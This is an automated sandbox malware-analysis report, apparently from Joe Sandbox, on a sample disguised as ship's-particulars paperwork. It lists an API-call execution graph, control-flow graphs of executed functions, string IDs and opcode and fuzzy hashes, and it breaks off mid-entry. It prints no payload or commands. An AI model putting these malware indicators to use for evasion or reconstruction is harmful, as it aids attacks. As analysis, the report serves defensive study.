                                                                                                                  execution_graph 38651 690d0f0 38652 690d158 CreateWindowExW 38651->38652 38654 690d214 38652->38654 38654->38654 38728 6902ac0 DuplicateHandle 38729 6902b56 38728->38729 38730 51e0848 38735 51e084e 38730->38735 38731 51e091b 38735->38731 38736 6901b70 38735->38736 38740 6901b60 38735->38740 38744 51e1342 38735->38744 38737 6901b7f 38736->38737 38748 690175c 38737->38748 38741 6901b7f 38740->38741 38742 690175c GetModuleHandleW 38741->38742 38743 6901ba0 38742->38743 38743->38735 38746 51e1356 38744->38746 38745 51e1440 38745->38735 38746->38745 38802 51e7e71 38746->38802 38749 6901767 38748->38749 38752 690271c 38749->38752 38751 6903126 38753 6902727 38752->38753 38754 690384c 38753->38754 38756 69054e0 38753->38756 38754->38751 38758 6905501 38756->38758 38757 6905525 38757->38754 38758->38757 38760 6905690 38758->38760 38761 690569d 38760->38761 38762 69056d6 38761->38762 38764 690416c 38761->38764 38762->38757 38765 6904177 38764->38765 38767 6905748 38765->38767 38768 69041a0 38765->38768 38767->38767 38769 69041ab 38768->38769 38775 69041b0 38769->38775 38771 69057f1 38771->38767 38774 69057b7 38779 690ac58 38774->38779 38785 690ac40 38774->38785 38778 69041bb 38775->38778 38776 6906bb8 38776->38774 38777 69054e0 GetModuleHandleW 38777->38776 38778->38776 38778->38777 38781 690acd5 38779->38781 38782 690ac89 38779->38782 38780 690ac95 38780->38771 38781->38771 38782->38780 38790 690aec0 38782->38790 38794 690aed0 38782->38794 38787 690ac58 38785->38787 38786 690ac95 38786->38771 38787->38786 38788 690aed0 GetModuleHandleW 38787->38788 38789 690aec0 GetModuleHandleW 38787->38789 38788->38786 38789->38786 38791 690aed0 38790->38791 38797 690af10 38791->38797 38792 690aeda 38792->38781 38796 690af10 GetModuleHandleW 38794->38796 38795 690aeda 38795->38781 38796->38795 38799 690af15 38797->38799 38798 690af54 38798->38792 38799->38798 38800 690b158 GetModuleHandleW 38799->38800 38801 690b185 38800->38801 38801->38792 38803 51e7e7b 38802->38803 38804 51e7f31 38803->38804 38808 691fbb8 38803->38808 38817 691f968 38803->38817 38821 691f978 38803->38821 38804->38746 38809 691fbbe 38808->38809 38812 691f98d 38808->38812 38816 691fc53 38809->38816 38825 51eea28 38809->38825 38828 51eea21 38809->38828 38810 691fba2 38810->38804 38811 691fd10 38811->38804 38812->38810 38815 691fbb8 GlobalMemoryStatusEx 38812->38815 38815->38812 38816->38804 38818 691f98d 38817->38818 38819 691fba2 38818->38819 38820 691fbb8 GlobalMemoryStatusEx 38818->38820 38819->38804 38820->38818 38822 691f98d 38821->38822 38823 691fba2 38822->38823 38824 691fbb8 GlobalMemoryStatusEx 38822->38824 38823->38804 38824->38822 38832 51eea51 38825->38832 38826 51eea36 38826->38811 38829 51eea28 38828->38829 38831 51eea51 GlobalMemoryStatusEx 38829->38831 38830 51eea36 38830->38811 38831->38830 38833 51eea6d 38832->38833 38835 51eea95 38832->38835 38833->38826 38834 51eeab6 38834->38826 38835->38834 38836 51eeb7e GlobalMemoryStatusEx 38835->38836 38837 51eebae 38836->38837 38837->38826 38655 f7d030 38656 f7d048 38655->38656 38657 f7d0a2 38656->38657 38662 690a4c4 38656->38662 38671 690d2a8 38656->38671 38675 690e3f8 38656->38675 38684 690d297 38656->38684 38663 690a4cf 38662->38663 38664 690e469 38663->38664 38666 690e459 38663->38666 38704 690a5ec 38664->38704 38688 690e590 38666->38688 38693 690e65c 38666->38693 38699 690e580 38666->38699 38667 690e467 38672 690d2ce 38671->38672 38673 690a4c4 CallWindowProcW 38672->38673 38674 690d2ef 38673->38674 38674->38657 38676 690e408 38675->38676 38677 690e469 38676->38677 38679 690e459 38676->38679 38678 690a5ec CallWindowProcW 38677->38678 38680 690e467 38678->38680 38681 690e590 CallWindowProcW 38679->38681 38682 690e580 CallWindowProcW 38679->38682 38683 690e65c CallWindowProcW 38679->38683 38681->38680 38682->38680 38683->38680 38685 690d2a8 38684->38685 38686 690a4c4 CallWindowProcW 38685->38686 38687 690d2ef 38686->38687 38687->38657 38690 690e5a4 38688->38690 38689 690e630 38689->38667 38708 690e638 38690->38708 38712 690e648 38690->38712 38694 690e61a 38693->38694 38695 690e66a 38693->38695 38697 690e638 CallWindowProcW 38694->38697 38698 690e648 CallWindowProcW 38694->38698 38696 690e630 38696->38667 38697->38696 38698->38696 38701 690e590 38699->38701 38700 690e630 38700->38667 38702 690e638 CallWindowProcW 38701->38702 38703 690e648 CallWindowProcW 38701->38703 38702->38700 38703->38700 38705 690a5f7 38704->38705 38706 690f8ca CallWindowProcW 38705->38706 38707 690f879 38705->38707 38706->38707 38707->38667 38709 690e648 38708->38709 38710 690e659 38709->38710 38715 690f800 38709->38715 38710->38689 38713 690e659 38712->38713 38714 690f800 CallWindowProcW 38712->38714 38713->38689 38714->38713 38716 690a5ec CallWindowProcW 38715->38716 38717 690f81a 38716->38717 38717->38710 38718 6902878 38719 69028be GetCurrentProcess 38718->38719 38721 6902910 GetCurrentThread 38719->38721 38722 6902909 38719->38722 38723 6902946 38721->38723 38724 690294d GetCurrentProcess 38721->38724 38722->38721 38723->38724 38725 6902983 38724->38725 38726 69029ab GetCurrentThreadId 38725->38726 38727 69029dc 38726->38727

                                                                                                                  Executed Functions

                                                                                                                  Function 06913060 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 655 6913060-6913081 656 6913083-6913086 655->656 657 6913088-69130a7 656->657 658 69130ac-69130af 656->658 657->658 659 6913850-6913852 658->659 660 69130b5-69130d4 658->660 661 6913854 659->661 662 6913859-691385c 659->662 668 69130d6-69130d9 660->668 669 69130ed-69130f7 660->669 661->662 662->656 665 6913862-691386b 662->665 668->669 670 69130db-69130eb 668->670 673 69130fd-691310c 669->673 670->673 781 691310e call 6913880 673->781 782 691310e call 6913878 673->782 674 6913113-6913118 675 6913125-6913402 674->675 676 691311a-6913120 674->676 697 6913842-691384f 675->697 698 6913408-69134b7 675->698 676->665 707 69134e0 698->707 708 69134b9-69134de 698->708 710 69134e9-69134fc 707->710 708->710 712 6913502-6913524 710->712 713 6913829-6913835 710->713 712->713 716 691352a-6913534 712->716 713->698 714 691383b 713->714 714->697 716->713 717 691353a-6913545 716->717 717->713 718 691354b-6913621 717->718 730 6913623-6913625 718->730 731 691362f-691365f 718->731 730->731 735 6913661-6913663 731->735 736 691366d-6913679 731->736 735->736 737 69136d9-69136dd 736->737 738 691367b-691367f 736->738 739 69136e3-691371f 737->739 740 691381a-6913823 737->740 738->737 741 6913681-69136ab 738->741 751 6913721-6913723 739->751 752 691372d-691373b 739->752 740->713 740->718 748 69136b9-69136d6 741->748 749 69136ad-69136af 741->749 748->737 749->748 751->752 755 6913752-691375d 752->755 756 691373d-6913748 752->756 760 6913775-6913786 755->760 761 691375f-6913765 755->761 756->755 759 691374a 756->759 759->755 765 6913788-691378e 760->765 766 691379e-69137aa 760->766 762 6913767 761->762 763 6913769-691376b 761->763 762->760 763->760 767 6913790 765->767 768 6913792-6913794 765->768 770 69137c2-6913813 766->770 771 69137ac-69137b2 766->771 767->766 768->766 770->740 772 69137b4 771->772 773 69137b6-69137b8 771->773 772->770 773->770 781->674 782->674
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-1582559945
                                                                                                                  • Opcode ID: 13f80885f76db4bc77c71bebd43a673bfb9d12e0b1a6fe5ccb418db5fff68077
                                                                                                                  • Instruction ID: add91a4e578b83ff49ee9f710709c5b41c6353e4927155d5591ff88a6318e176
                                                                                                                  • Opcode Fuzzy Hash: 13f80885f76db4bc77c71bebd43a673bfb9d12e0b1a6fe5ccb418db5fff68077
                                                                                                                  • Instruction Fuzzy Hash: 65321035E1061ACFCB14EF75D99459DB7B6BFC9300F20C69AD419AB264EF30A985CB80
                                                                                                                  Function 06917D80 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1376 6917d80-6917d9e 1377 6917da0-6917da3 1376->1377 1378 6917da5-6917dbf 1377->1378 1379 6917dc4-6917dc7 1377->1379 1378->1379 1380 6917dc9-6917dd7 1379->1380 1381 6917dde-6917de1 1379->1381 1391 6917e26-6917e3c 1380->1391 1392 6917dd9 1380->1392 1382 6917de3-6917dff 1381->1382 1383 6917e04-6917e07 1381->1383 1382->1383 1386 6917e14-6917e16 1383->1386 1387 6917e09-6917e13 1383->1387 1388 6917e18 1386->1388 1389 6917e1d-6917e20 1386->1389 1388->1389 1389->1377 1389->1391 1396 6917e42-6917e4b 1391->1396 1397 6918057-6918061 1391->1397 1392->1381 1398 6917e51-6917e6e 1396->1398 1399 6918062-6918097 1396->1399 1408 6918044-6918051 1398->1408 1409 6917e74-6917e9c 1398->1409 1402 6918099-691809c 1399->1402 1404 69182d1-69182d4 1402->1404 1405 69180a2-69180b1 1402->1405 1406 69182f7-69182fa 1404->1406 1407 69182d6-69182f2 1404->1407 1413 69180d0-6918114 1405->1413 1414 69180b3-69180ce 1405->1414 1411 6918300-691830c 1406->1411 1412 69183a5-69183a7 1406->1412 1407->1406 1408->1396 1408->1397 1409->1408 1429 6917ea2-6917eab 1409->1429 1419 6918317-6918319 1411->1419 1416 69183a9 1412->1416 1417 69183ae-69183b1 1412->1417 1430 69182a5-69182bb 1413->1430 1431 691811a-691812b 1413->1431 1414->1413 1416->1417 1417->1402 1420 69183b7-69183c0 1417->1420 1424 6918331-6918335 1419->1424 1425 691831b-6918321 1419->1425 1427 6918343 1424->1427 1428 6918337-6918341 1424->1428 1432 6918323 1425->1432 1433 6918325-6918327 1425->1433 1434 6918348-691834a 1427->1434 1428->1434 1429->1399 1435 6917eb1-6917ecd 1429->1435 1430->1404 1443 6918131-691814e 1431->1443 1444 6918290-691829f 1431->1444 1432->1424 1433->1424 1438 691835b-6918394 1434->1438 1439 691834c-691834f 1434->1439 1446 6917ed3-6917efd 1435->1446 1447 6918032-691803e 1435->1447 1438->1405 1459 691839a-69183a4 1438->1459 1439->1420 1443->1444 1453 6918154-691824a call 69165a0 1443->1453 1444->1430 1444->1431 1460 6917f03-6917f2b 1446->1460 1461 6918028-691802d 1446->1461 1447->1408 1447->1429 1509 6918258 1453->1509 1510 691824c-6918256 1453->1510 1460->1461 1467 6917f31-6917f5f 1460->1467 1461->1447 1467->1461 1473 6917f65-6917f6e 1467->1473 1473->1461 1474 6917f74-6917fa6 1473->1474 1482 6917fb1-6917fcd 1474->1482 1483 6917fa8-6917fac 1474->1483 1482->1447 1484 6917fcf-6918026 call 69165a0 1482->1484 1483->1461 1486 6917fae 1483->1486 1484->1447 1486->1482 1511 691825d-691825f 1509->1511 1510->1511 1511->1444 1512 6918261-6918266 1511->1512 1513 6918274 1512->1513 1514 6918268-6918272 1512->1514 1515 6918279-691827b 1513->1515 1514->1515 1515->1444 1516 691827d-6918289 1515->1516 1516->1444
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq
                                                                                                                  • API String ID: 0-2537786760
                                                                                                                  • Opcode ID: dbd7cc43d44d1d26fec1736a03258eff12cbefa74a9c4ec856913d5a9604c59c
                                                                                                                  • Instruction ID: 089e4762957dddf7598f6382a7e4bc4d017e3ac0b1014e362af70971363b87c2
                                                                                                                  • Opcode Fuzzy Hash: dbd7cc43d44d1d26fec1736a03258eff12cbefa74a9c4ec856913d5a9604c59c
                                                                                                                  • Instruction Fuzzy Hash: 04028E31B0021A8FDB54DF68D6906AEB7F6EF84300F248929E815DB794DB75DD46CB80
                                                                                                                  Function 069155A0 Relevance: 1.8, Strings: 1, Instructions: 600COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $
                                                                                                                  • API String ID: 0-3993045852
                                                                                                                  • Opcode ID: 798c4037c3b55aa9f7206231b0051564c9db80fb3f0dcdd02178da42a114e0a4
                                                                                                                  • Instruction ID: 2bb53f3e54d46aac32db02089087aa631aa3eb6dc0f25c479cbc4fd3897f6ba8
                                                                                                                  • Opcode Fuzzy Hash: 798c4037c3b55aa9f7206231b0051564c9db80fb3f0dcdd02178da42a114e0a4
                                                                                                                  • Instruction Fuzzy Hash: 4B229DB5E002198FDF60DBA8C5906AEB7B6EF84320F36846AD455AF794DB31DC41CB90
                                                                                                                  Function 069165F0 Relevance: .8, Instructions: 826COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3248bfca06167de08cf1f20a07798f2fc99b28bf90bd78d143dded2634866a0d
                                                                                                                  • Instruction ID: f2f3c4e913c741334d8ad7cd8e8a88631c22265f6c8bdbc237105e3a93606749
                                                                                                                  • Opcode Fuzzy Hash: 3248bfca06167de08cf1f20a07798f2fc99b28bf90bd78d143dded2634866a0d
                                                                                                                  • Instruction Fuzzy Hash: 3662AA34F002098FDB54DB68D994AADB7B6EF88310F248469E816EF795DB35ED41CB80
                                                                                                                  Function 0691C190 Relevance: .6, Instructions: 639COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ddc0076973bfb754b23c329f69712c08c953a2eec7e06867d5e96fd180d94eb9
                                                                                                                  • Instruction ID: 70f817b827dc84b44fd72810e97cbf45d93bc96c60ea21adf6666e0a367cc1c1
                                                                                                                  • Opcode Fuzzy Hash: ddc0076973bfb754b23c329f69712c08c953a2eec7e06867d5e96fd180d94eb9
                                                                                                                  • Instruction Fuzzy Hash: DE326B35B00209CFDB54DB68D990BADB7B6FB88310F208929E515EB755DB38EC42CB91
                                                                                                                  Function 0691B238 Relevance: .6, Instructions: 568COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d4b875a6c0d09a4f77db7e51ab5761a31810f4578e404675c058251704c8600
                                                                                                                  • Instruction ID: 02977fa8b7f475a360a87fedefce6b11330de43bc5a50ccacc46742cd9e5e3ed
                                                                                                                  • Opcode Fuzzy Hash: 6d4b875a6c0d09a4f77db7e51ab5761a31810f4578e404675c058251704c8600
                                                                                                                  • Instruction Fuzzy Hash: 3D226D70E1010D8BEF64DBA8D5907ADB7BAEB45310F308926E455DB799CB34DC82CB91
                                                                                                                  Function 0691ACE0 Relevance: 10.4, Strings: 8, Instructions: 400COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 527 691ace0-691acfe 528 691ad00-691ad03 527->528 529 691ad05-691ad09 528->529 530 691ad14-691ad17 528->530 531 691af0c-691af16 529->531 532 691ad0f 529->532 533 691ad21-691ad24 530->533 534 691ad19-691ad1e 530->534 532->530 535 691ad26-691ad39 533->535 536 691ad3e-691ad41 533->536 534->533 535->536 537 691ad47-691ad4a 536->537 538 691aefd-691af06 536->538 540 691ad5a-691ad5d 537->540 541 691ad4c-691ad55 537->541 538->531 542 691ad5f-691ad68 538->542 540->542 543 691ad77-691ad7a 540->543 541->540 544 691af17-691af21 542->544 545 691ad6e-691ad72 542->545 546 691ad7c-691ad89 543->546 547 691ad8e-691ad91 543->547 552 691af23-691af2c 544->552 553 691aeac-691aeb2 544->553 545->543 546->547 548 691ad93-691adaf 547->548 549 691adb4-691adb6 547->549 548->549 554 691adb8 549->554 555 691adbd-691adc0 549->555 562 691af3e-691af4e 552->562 563 691af2e-691af3b 552->563 556 691aeb4 553->556 557 691aeb6-691aeb8 553->557 554->555 555->528 560 691adc6-691adea 555->560 561 691aec2-691aef3 556->561 557->561 576 691adf0-691adff 560->576 577 691aefa 560->577 561->577 566 691af50-691af53 562->566 563->562 568 691af60-691af63 566->568 569 691af55-691af59 566->569 570 691af70-691af73 568->570 571 691af65-691af6f 568->571 573 691af79-691afb4 569->573 574 691af5b 569->574 570->573 575 691b1dc-691b1df 570->575 582 691b1a7-691b1ba 573->582 583 691afba-691afc6 573->583 574->568 580 691b1e1 call 691b238 575->580 581 691b1ee-691b1f1 575->581 590 691ae01-691ae07 576->590 591 691ae17-691ae52 call 69165a0 576->591 577->538 593 691b1e7-691b1e9 580->593 586 691b1f3-691b20f 581->586 587 691b214-691b216 581->587 592 691b1bc 582->592 600 691afe6-691b02a 583->600 601 691afc8-691afe1 583->601 586->587 588 691b218 587->588 589 691b21d-691b220 587->589 588->589 589->566 595 691b226-691b230 589->595 597 691ae09 590->597 598 691ae0b-691ae0d 590->598 614 691ae54-691ae5a 591->614 615 691ae6a-691ae81 591->615 592->575 593->581 597->591 598->591 619 691b046-691b085 600->619 620 691b02c-691b03e 600->620 601->592 617 691ae5c 614->617 618 691ae5e-691ae60 614->618 625 691ae83-691ae89 615->625 626 691ae99-691aeaa 615->626 617->615 618->615 627 691b08b-691b166 call 69165a0 619->627 628 691b16c-691b181 619->628 620->619 631 691ae8b 625->631 632 691ae8d-691ae8f 625->632 626->553 626->561 627->628 628->582 631->626 632->626
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-3929485403
                                                                                                                  • Opcode ID: f3da349b4b64ab379ac703fc249d9e007de8c330a55fa49b6495a4bf31b8ee7f
                                                                                                                  • Instruction ID: f093064db0bd54a7624f517bebdb57449f233d5c77e14fdd7f1f687cb5a3d50f
                                                                                                                  • Opcode Fuzzy Hash: f3da349b4b64ab379ac703fc249d9e007de8c330a55fa49b6495a4bf31b8ee7f
                                                                                                                  • Instruction Fuzzy Hash: 13E19D30F112098FDB55DFA8D9806AEB7B6EF85300F208929E815EF759DB309D46CB91
                                                                                                                  Function 0691B658 Relevance: 8.0, Strings: 6, Instructions: 473COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 783 691b658-691b67a 784 691b67c-691b67f 783->784 785 691b691-691b694 784->785 786 691b681 784->786 787 691b696-691b6f3 call 69165a0 785->787 788 691b6f8-691b6fb 785->788 789 691b689-691b68c 786->789 787->788 790 691b702-691b705 788->790 791 691b6fd-691b6ff 788->791 789->785 792 691b743-691b746 790->792 793 691b707-691b71c 790->793 791->790 796 691b750-691b753 792->796 797 691b748-691b74b 792->797 802 691b9f3-691ba2e 793->802 803 691b722-691b73e 793->803 800 691b755-691b759 796->800 801 691b76a-691b76d 796->801 797->796 800->802 804 691b75f-691b765 800->804 805 691b78a-691b78d 801->805 806 691b76f-691b778 801->806 817 691ba30-691ba33 802->817 803->792 804->801 809 691b7a0-691b7a3 805->809 810 691b78f-691b79b 805->810 806->802 808 691b77e-691b785 806->808 808->805 809->797 811 691b7a5-691b7a8 809->811 810->809 815 691b7aa-691b7ae 811->815 816 691b7bf-691b7c2 811->816 815->802 819 691b7b4-691b7ba 815->819 822 691b8e3-691b8ec 816->822 823 691b7c8-691b7cb 816->823 820 691ba35-691ba51 817->820 821 691ba56-691ba59 817->821 819->816 820->821 827 691bcc5-691bcc7 821->827 828 691ba5f-691ba87 821->828 822->806 829 691b8f2 822->829 824 691b7ed-691b7f0 823->824 825 691b7cd-691b7e8 823->825 834 691b800-691b803 824->834 835 691b7f2-691b7f5 824->835 825->824 832 691bcc9 827->832 833 691bcce-691bcd1 827->833 878 691ba91-691bad5 828->878 879 691ba89-691ba8c 828->879 830 691b8f7-691b8fa 829->830 836 691b904-691b907 830->836 837 691b8fc-691b901 830->837 832->833 833->817 842 691bcd7-691bce0 833->842 838 691b813-691b816 834->838 839 691b805-691b80e 834->839 844 691b9b2-691b9b5 835->844 845 691b7fb 835->845 846 691b909-691b90d 836->846 847 691b92a-691b92d 836->847 837->836 838->797 848 691b81c-691b81f 838->848 839->838 844->802 850 691b9b7-691b9be 844->850 845->834 846->802 852 691b913-691b923 846->852 855 691b93a-691b93d 847->855 856 691b92f-691b935 847->856 853 691b821-691b822 848->853 854 691b827-691b82a 848->854 857 691b9c3-691b9c6 850->857 873 691b959-691b95d 852->873 881 691b925 852->881 853->854 860 691b851-691b854 854->860 861 691b82c-691b830 854->861 862 691b954-691b957 855->862 863 691b93f-691b943 855->863 856->855 864 691b9d6-691b9d8 857->864 865 691b9c8-691b9cf 857->865 860->835 869 691b856-691b859 860->869 861->802 868 691b836-691b846 861->868 862->873 874 691b97e-691b981 862->874 863->802 870 691b949-691b94f 863->870 875 691b9da 864->875 876 691b9df-691b9e2 864->876 871 691b9d1 865->871 872 691b983-691b98c 865->872 868->846 895 691b84c 868->895 882 691b85b-691b877 869->882 883 691b87c-691b87f 869->883 870->862 871->864 880 691b991-691b994 872->880 873->802 884 691b963-691b973 873->884 874->872 874->880 875->876 876->784 877 691b9e8-691b9f2 876->877 906 691badb-691bae4 878->906 907 691bcba-691bcc4 878->907 879->842 887 691b9a4-691b9a7 880->887 888 691b996-691b99f 880->888 881->847 882->883 885 691b881-691b896 883->885 886 691b8be-691b8c1 883->886 884->797 897 691b979 884->897 885->802 902 691b89c-691b8b9 885->902 893 691b8c3-691b8c6 886->893 894 691b8cb-691b8ce 886->894 887->797 892 691b9ad-691b9b0 887->892 888->887 892->844 892->857 893->894 899 691b8d0-691b8d9 894->899 900 691b8de-691b8e1 894->900 895->860 897->874 899->900 900->822 900->830 902->886 908 691bcb0-691bcb5 906->908 909 691baea-691bb56 call 69165a0 906->909 908->907 917 691bc50-691bc65 909->917 918 691bb5c-691bb61 909->918 917->908 920 691bb63-691bb69 918->920 921 691bb7d 918->921 922 691bb6b-691bb6d 920->922 923 691bb6f-691bb71 920->923 924 691bb7f-691bb85 921->924 925 691bb7b 922->925 923->925 926 691bb87-691bb8d 924->926 927 691bb9a-691bba7 924->927 925->924 928 691bb93 926->928 929 691bc3b-691bc4a 926->929 934 691bba9-691bbaf 927->934 935 691bbbf-691bbcc 927->935 928->927 930 691bc02-691bc0f 928->930 931 691bbce-691bbdb 928->931 929->917 929->918 940 691bc11-691bc17 930->940 941 691bc27-691bc34 930->941 943 691bbf3-691bc00 931->943 944 691bbdd-691bbe3 931->944 936 691bbb1 934->936 937 691bbb3-691bbb5 934->937 935->929 936->935 937->935 945 691bc19 940->945 946 691bc1b-691bc1d 940->946 941->929 943->929 947 691bbe5 944->947 948 691bbe7-691bbe9 944->948 945->941 946->941 947->943 948->943
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-1582559945
                                                                                                                  • Opcode ID: 9f0d9c23fe74c16bef5917cbecd98b744a777d39b33994ada943989a25d74f30
                                                                                                                  • Instruction ID: 15359e0248084f3e5cf55a350418169a43940dcc5ace6b5bc7ad300f7297fc94
                                                                                                                  • Opcode Fuzzy Hash: 9f0d9c23fe74c16bef5917cbecd98b744a777d39b33994ada943989a25d74f30
                                                                                                                  • Instruction Fuzzy Hash: 55025930E0020E8FDBA4DB68D5906ADB7B6FB45314F30896AE415DFA59DB34DC82CB91
                                                                                                                  Function 06902872 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 951 6902872-6902907 GetCurrentProcess 955 6902910-6902944 GetCurrentThread 951->955 956 6902909-690290f 951->956 957 6902946-690294c 955->957 958 690294d-6902981 GetCurrentProcess 955->958 956->955 957->958 960 6902983-6902989 958->960 961 690298a-69029a2 958->961 960->961 974 69029a5 call 6902e38 961->974 975 69029a5 call 6902e28 961->975 976 69029a5 call 6902a48 961->976 964 69029ab-69029da GetCurrentThreadId 965 69029e3-6902a45 964->965 966 69029dc-69029e2 964->966 966->965 974->964 975->964 976->964
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 069028F6
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 06902933
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 06902970
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 069029C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: b5bbb4ae6a89ff6415bd72f0c250991a237a7d48fdfb32fd9f6bb77d791be64f
                                                                                                                  • Instruction ID: 95a7a51bcfdad323773ebe3b9f2f6f9672f30835dd77063cfd5f03183f9b6c98
                                                                                                                  • Opcode Fuzzy Hash: b5bbb4ae6a89ff6415bd72f0c250991a237a7d48fdfb32fd9f6bb77d791be64f
                                                                                                                  • Instruction Fuzzy Hash: 7E5185B0900309CFDB54CFA9DA48BAEBBF5EF88314F20841AE519A73A0D7755984CF61
                                                                                                                  Function 06902878 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 977 6902878-6902907 GetCurrentProcess 981 6902910-6902944 GetCurrentThread 977->981 982 6902909-690290f 977->982 983 6902946-690294c 981->983 984 690294d-6902981 GetCurrentProcess 981->984 982->981 983->984 986 6902983-6902989 984->986 987 690298a-69029a2 984->987 986->987 1000 69029a5 call 6902e38 987->1000 1001 69029a5 call 6902e28 987->1001 1002 69029a5 call 6902a48 987->1002 990 69029ab-69029da GetCurrentThreadId 991 69029e3-6902a45 990->991 992 69029dc-69029e2 990->992 992->991 1000->990 1001->990 1002->990
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 069028F6
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 06902933
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 06902970
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 069029C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
